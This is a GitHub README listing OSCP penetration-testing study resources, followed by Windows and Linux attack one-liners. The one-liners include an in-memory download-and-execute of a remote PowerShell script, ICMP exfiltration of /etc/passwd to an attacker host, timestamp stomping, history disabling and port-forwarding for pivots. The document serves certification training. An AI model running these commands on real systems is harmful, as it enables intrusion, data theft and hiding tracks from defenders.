Skip to content

Latest commit

 

History

History
329 lines (150 loc) · 16.6 KB

README.md

File metadata and controls

329 lines (150 loc) · 16.6 KB

OSCP-Archives

During my journey to getting the OSCP, I always come across many articles, Git repo, videos, and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great, I wanted to also build a curated list of the resources that I've collected overtime, all in one area for everyone to access.

This list will continue to grow over time as I come across new resources. If you know more resources or want me to add yours, please let me know and I'll add it in.

PS. A VERY big thank you to all the authors of these resources, for taking the time and energy putting this invaluable information together.

Enjoy!

~ Official Exam Guide ~

OSCP Certification Exam Guide - Offensive Security

~ Reviews and Experiences ~

31 Days of OSCP Experience - ParanoidNinja

Detailed Guide on OSCP Prep – From Newbie to OSCP - Ramkisan Mohan

Offensive Security Certified Professional – Lab and Exam Review - theslickgeek

Passing The OSCP - Pink_Panther

OSCP Experience and the first torture! - Nitesh Shilpkar

~ Helpful VMs for Practice ~

Kioptrix - loneferret

OSCP-like Vulnhub VMs - abatchy

OSCP Training VM’s hosted on Vulnhub.com - Andrew Hilton

Pinky's Palace CTFs - Pink_Panther

Hack The Box OSCP-like VMs - Tony

~ CTF Walkthroughs & Educational Videos ~

Hack The Box CTFs - ippsec

Search Ippsec's Videos for Specific Topics - ippsec

Hack The Box, Over The Wire, Other CTFs - derekrook

VunHub Walkthroughs - Arr0way

~ OSCP Prep, Tools, Cheatsheets, Guides, etc. ~

Metasploit Unleashed - Offensive Security

15 Ways to Download a File - NetSPI

Explain Shell - Great at explaining Linux Commands in Detail - Idan Kamara

Mixed Archives - g0tmi1k

OWASP Testing Guide v4 Table of Contents - owasp

Penetration Testing Tools Cheat Sheet - Arr0way

Reverse Shell Cheat Sheet - Arr0way

Linux Commands Cheat Sheet - Arr0way

Reverse Shell Cheat Sheet - Pentest Monkey

Black Room Sec - CTFs, Guides, Tools - blackroomsec

Dostoevskylabs's PenTest Notes - Dostoevskylabs

Pentest Compilation - adon90

SecLists - danielmiessler

OSCP-Prep - burntmybagel

OSCP-Prep - rhodejo

OSCP Scripts - garyhooks

OSCP Scripts & Documents - ihack4falafel

OSCP Recon Script - xapax

Cheatsheet-God - OlivierLaflamme

OSCP-Repo - rewardone

Cheatsheets - slyth11907

OSCP tricks - WarLord

Go-For-OSCP - WarLord

How to prepare for the OSCP ? A STUDY PLAN - Magda CHELLY, CISSP, Ph.D

OSCP useful Links - backdoorshell

Total OSCP Guide - sushant747

OSCP Course & Exam Preparation - 411Hall

OSCP Journey: Python Code Challenges - Elias Ibrahim

SMB Enumeration Checklist - 0xdf

Tunneling and Pivoting - 0xdf

Tunneling and Port Forwarding - HackTricks

Post-Exploitation Windows File Transfers with SMB - 0xdf

Multiple Ways to Exploit Tomcat Manager - Raj Chande

PHP Web Shell - WhiteWinterWolf

Msfvenom Cheat Sheet - LucianNitescu

Linux Shells - HackTricks

Windows Shells - HackTricks

Dumping Clear-Text Credentials - Pentestlab

OSCP Exam Report Template in Markdown - noraj

OSCP Omnibus - alexiasa

~ Brute Force ~

Brute Force - CheatSheet - HackTricks

~ Checklists ~

Checklist - Linux Privilege Escalation - HackTricks

Checklist - Local Windows Privilege Escalation - HackTricks

~ SQL Injection ~

Preliminary SQL Injection Part 1 - Jatin Yadav

Preliminary SQL Injection Part 2 - Jatin Yadav

Informix SQL Injection Cheat Sheet - pentestmonkey

MSSQL Injection Cheat Sheet - pentestmonkey

Oracle SQL Injection Cheat Sheet - pentestmonkey

MySQL SQL Injection Cheat Sheet - pentestmonkey

Postgres SQL Injection Cheat Sheet - pentestmonkey

DB2 SQL Injection Cheat Sheet - pentestmonkey

Ingres SQL Injection Cheat Sheet - pentestmonkey

SQL Injection Reference Library & Techniques - SQLINjection

~ Linux Privilege Escalation ~

OSCP - Linux Priviledge Escalation - WarLord

Basic Linux Privilege Escalation - g0tmi1k

Linux Priv escalation - carlospolop

Linux Privilege Escalation - HackTricks

~ Windows Privilege Escalation ~

OSCP - Windows Priviledge Escalation - WarLord

Awesome-Windows-Exploitation - enddo

Windows Priv escalation - kyawthiha7

Windows Privilege Escalation Fundamentals - FuzzySec (b33f)

Windows Priv escalation - carlospolop

Windows Local Privilege Escalation - HackTricks

~ LFI & RFI ~

PHP Local and Remote File Inclusion (LFI, RFI) Attacks - WarLord

LFI Cheat Sheet - Arr0way

~ Exploits & Exploit Developtment, Tutorials ~

Windows & Linux Exploit Development - FuzzySec (b33f)

Exploit DB - Offensive Security

Exploit Development - Starting from Part 1 - Corelan Team

Over The Wire - Wargames - OverTheWire

Unix Privilege Escalation Exploits - Kabot

~ Windows & linux Kernel Exploits ~

Windows Kernel Exploits - SecWiki

Linux Kernel Exploits - lucyoa

Windows Exploit Development – Part 1: The Basics

Windows Exploit Development – Part 2: Intro-Stack-Overflow

Windows Exploit Development – Part 3: Changing-Offsets-and-Rebased-Modules

Windows Exploit Development – Part 4: Locating-Shellcode-Jumps

Windows Exploit Development – Part 5: Locating-Shellcode-Egghunting

Windows Exploit Development – Part 6: Seh-Exploits

Windows Exploit Development – Part 7: Unicode-Buffer-Overflows

Zero Day Zen Garden: Windows Exploit Development - Part 0 [Dev Setup & Advice]

Zero Day Zen Garden: Windows Exploit Development - Part 1 [Stack Buffer Overflow Intro]

Zero Day Zen Garden: Windows Exploit Development - Part 2 [JMP to Locate Shellcode]

Zero Day Zen Garden: Windows Exploit Development - Part 3 [Egghunter to Locate Shellcode]

Zero Day Zen Garden: Windows Exploit Development - Part 4 [Overwriting SEH with Buffer Overflows]

Zero Day Zen Garden: Windows Exploit Development - Part 5 [Return Oriented Programming Chains]

~ Windows One-Liners ~ kindredsec

Obtain Permission String from All Services

sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul

Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths

sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Forward traffic to an internal host

netsh interface portproxy add v4tov4 listenport=*port* listenaddress=*ip* connectport=*port* connectaddress=*ip

Download and execute a remote PowerShell script (all in-memory)

iex (New-Object Net.Webclient).DownloadString('*remote_file*')

Check the permissions of all binaries associated with services

$list = Get-WmiObject win32_service | select -ExpandProperty PathName | Select-String -NotMatch svchost; foreach ( $path in $list ) { icacls $path 2>null | Select-String -NotMatch "Successfully processed" }

Enable RDP (may also need firewall rule)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

~ Linux One-Liners ~ kindredsec

Stomp a timestamp to match other install-time files

touch -a -m -t $(stat -c '%y' /bin/bash | cut -d ":" -f 1,2 | sed 's/[- :]//g') malicious_file.sh

Prevent ran bash commands from being written to a history file

export HISTFILE=/dev/null

Exfiltrate users over ICMP

while read line; do ping -c 1 -p $(echo "$line" | cut -d ":" -f 1,2,3,7 | xxd -ps) my_attacking_host; done < /etc/passwd

Locate mySQL credentials within web files

egrep -ri '(mysql_connect\(|mysqli_connect\(|new mysqli\(|PDO\(\"mysql:)' /var/www/* 2> /dev/null

List all the SUID Binaries on a System

find / -perm -4000 2>/dev/null

Creates iptables rules to transparently route traffic destined to a specific port to an internal host

iptables -t nat -A PREROUTING -i *interface* -p tcp --dport *port* -j DNAT --to-destination *remote_ip_address* & iptables -t nat -A POSTROUTING -o *interface* -p tcp --dport *port* -d *remote_ip_address* -j SNAT --to-source *local_ip_address*

List all running processes being ran by users other than your current one

ps -elf | grep -v $(whoami)

List all system cronjobs

for i in d hourly daily weekly monthly; do echo; echo "--cron.$i--"; ls -l /etc/cron.$i; done